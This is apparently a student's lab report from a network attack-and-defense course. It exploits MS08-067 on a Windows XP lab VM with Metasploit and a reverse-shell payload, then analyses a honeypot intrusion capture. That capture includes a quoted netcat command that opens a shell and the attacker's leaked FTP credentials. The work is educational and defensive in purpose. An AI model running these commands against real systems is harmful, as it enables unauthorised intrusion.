20212901 薛德凡2021-2022-2 《网络攻防实践》第六次作业

[20212901 薛德凡2021-2022-2 《网络攻防实践》第六次作业 ]

一、实践内容

(1)动手实践Metasploit windows attacker

  • 任务:使用metasploit软件进行windows远程渗透统计实验
  • 具体任务内容:使用windows Attacker/BT4攻击机尝试对windows Metasploitable靶机上的MS08-067漏洞进行远程渗透攻击,获取目标主机的访问权

(2)取证分析实践:解码一次成功的NT系统破解攻击。

  • 来自212.116.251.162的攻击者成功攻陷了一台由rfp部署的蜜罐主机172.16.1.106,(主机名为lab.wiretrip.net),要求提取并分析攻击的全部过程。
    • 攻击者使用了什么破解工具进行攻击
    • 攻击者如何使用这个破解工具进入并控制了系统
    • 攻击者获得系统访问权限后做了什么
    • 我们如何防止这样的攻击
    • 你觉得攻击者是否警觉了他的目标是一台蜜罐主机?如果是,为什么

(3)团队对抗实践:windows系统远程渗透攻击和分析。

  • 攻方使用metasploit选择漏洞进行攻击,获得控制权。(要求写出攻击方的同学信息、使用漏洞、相关IP地址等)
  • 防守方使用wireshark监听获得的网络数据包,分析攻击过程,获取相关信息。

二、实验相关知识

1、Metasploit是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具。当H.D. Moore在2003年发布Metasploit时,计算机安全状况也被永久性地改变了。仿佛一夜之间,任何人都可以成为黑客,每个人都可以使用攻击工具来攻击那些未打过补丁或者刚刚打过补丁的漏洞。软件厂商再也不能推迟发布针对已公布漏洞的补丁了,这是因为Metasploit团队一直都在努力开发各种攻击工具,并将它们贡献给所有Metasploit用户。

工作过程

三、实验内容

1、实验各主机ip设置

主机 IP
kali 192.168.200.11
WIN XP professional 192.168.200.12

2、动手实践Metasploit windows attacker

  • 任务:使用metasploit软件进行windows远程渗透统计实验

  • 具体任务内容:使用windows Attacker/BT4攻击机尝试对windows Metasploitable靶机上的MS08-067漏洞进行远程渗透攻击,获取目标主机的访问权

    在kali虚拟机中输入命令msfconsole进入metasploit。

image-20220420205510604

输入命令search ms08_067查找ms08_067漏洞,下图发现其中包含该漏洞

image-20220420205628057

输入命令:use exploit/windows/smb/ms08_067_netapi使用ms08_067_netapi漏洞相关攻击脚本

image-20220420210717733

show payloads列举出所有可用的攻击负载

image-20220420210702416

执行命令:set PAYLOAD generic/shell_reverse_tcp选择你要用的攻击负载模块

image-20220420210637693

然后show options显示我们需要在攻击前需要设置的数据

image-20220420210623699

按照靶机RHOST喝攻击机LHOST的IP,其中RHOST为192.168.200.13 LHOST为192.168.200.11

image-20220420212142622

使用命令show options再次查看设置后的payload状态

image-20220420210540675

使用命令set TARGET 0,设置目标操作系统平台类型,其中0代表自动匹配

image-20220420210508879

输入exploit开始攻击

image-20220420215821164

在kali上执行ipconfig/all得到如下图所示,查询到了靶机的IP

image-20220420215958663

在winxp上执行同样的命令,与攻击机结果对比,得到攻击成功的验证

image-20220420215944618

实践二:解码一次成功的NT系统破解攻击

使用wireshark打开snort-0204@0117.log

(1)攻击者使用了什么破解工具进行攻击

image-20220421160350214

使用ip.addr == 213.116.251.162 && ip.addr == 172.16.1.106作为筛选条件,可以发现攻击者建立TCP三次握手连接后,进行了一次http的访问。

image-20220421160804883

其中包含了客户端的操作系统等信息

image-20220421160929022

在其中的117数据包中发现,攻击者访问了boot.ini文件,并且其中%C0%AF为Unicode编码模式,在Unicode编码中对应符号/,可以分析得到为Unicode攻击。

image-20220421161054632

在其中的140数据包中发现攻击者在获取一个msadcs.dll文件

image-20220421161318687

追踪其中的149数据包TCP数据流,发现其中包含了select * from xxx的sql注入攻击,并且还有字符串ADM!ROX!YOUR!WORLD的出现,推测得知攻击者利用名为msadc2.pl工具发起的攻击。

image-20220421161550300

(2)攻击者如何使用这个破解工具进入并控制了系统

追踪其中的299数据包TCP数据流,可以发现攻击者尝试连入FTP服务,但是没有正确输入账号密码,显示登录失败。

image-20220421162227382

追踪其中的1107数据包TCP数据流,可以发现攻击者使用USER johna2k ,PASS haxedj00,成功连接了FTP服务

image-20220421162410551

追踪其中的1224数据包TCP数据流,可以发现攻击者利用命令cmd1.exe /c nc -l -p 6969 -e cmd1.exe,连接6969端口,获取了权限

image-20220421162608961

(3)攻击者获得系统访问权限后做了什么

tcp.port == 6969作为筛选条件,对其中的数据包进行TCP数据流追踪,可以发现攻击者嗅探了多个文件目录,并且删除了例如ftpcom,heh.txt,pdump.exe等等文件

image-20220421163208965

image-20220421163318998

image-20220421163609509

攻击者希望建立net session,但是失败了

image-20220421163950380

攻击者尝试在WINNT\repairs创建文件,但是失败了

image-20220421164143548

(4)我们如何防止这样的攻击

1、要及时升级系统,修复相关漏洞。

2、定期了解相关漏洞知识。

3、开启系统或软件自带的防火墙。

4、禁用用不着的 RDS 等服务

5)你觉得攻击者是否警觉了他的目标是一台蜜罐主机?如果是,为什么

攻击者已经意识到了这是一个蜜罐主机,攻击者创建文件并输入:C:>echo best honeypot i've seen till now :) > rfp.txt,表明他已经意识到了。

image-20220421164520648

实践三:团队对抗实践: Windows系统远程渗透攻击与分析

1、实验各主机ip设置

主机 IP
攻击机:kali 192.168.200.11
靶机:WIN XP professional 192.168.200.12

攻击方

使用kali虚拟机作为攻击机(20212901xdf),使用漏洞为实践一的MS08-067漏洞,相关ip如上表所示

实验过程与实践一类似不一一阐述,如下图执行exploit成功后,在靶机中创建名字为攻击者学号姓名的文件夹。

image-20220421154232301

攻击方创建的包含攻击方信息文件夹如图所示:

image-20220421154316964

防守方

打开wiresshark,可以看出攻击者ip地址192.168.200.11,端口4444,靶机ip地址192.168.200.12,端口1833等信息

image-20220420220619989

从下图中我们发现攻击机向靶机发了许多SMB、TCP协议包

image-20220420221246229

打开其中的TCP数据包可以看到其中包含了靶机的系统:Windows XP

image-20220420221420264

攻击方输入ipconfig

image-20220420221727681

wireshark中可以捕捉到刚刚输入的命令image-20220420221759300

四、学习中遇到的问题及解决

问题1:kali攻击机利用漏洞无法进入winserver,显示连接失败。

问题1解决方案:尝试了关闭防火墙,更改ip策略等信息不奏效,最后选择更换靶机系统成功解决

五、实践总结

本次实验真正意义上利用了一个具体的漏洞,让我明白了漏洞可能会带来的危害,之后要注意升级系统修补漏洞,防止安全事件发生。

posted @ 2022-04-21 16:52  纯蓝色111  阅读(69)  评论(0编辑  收藏  举报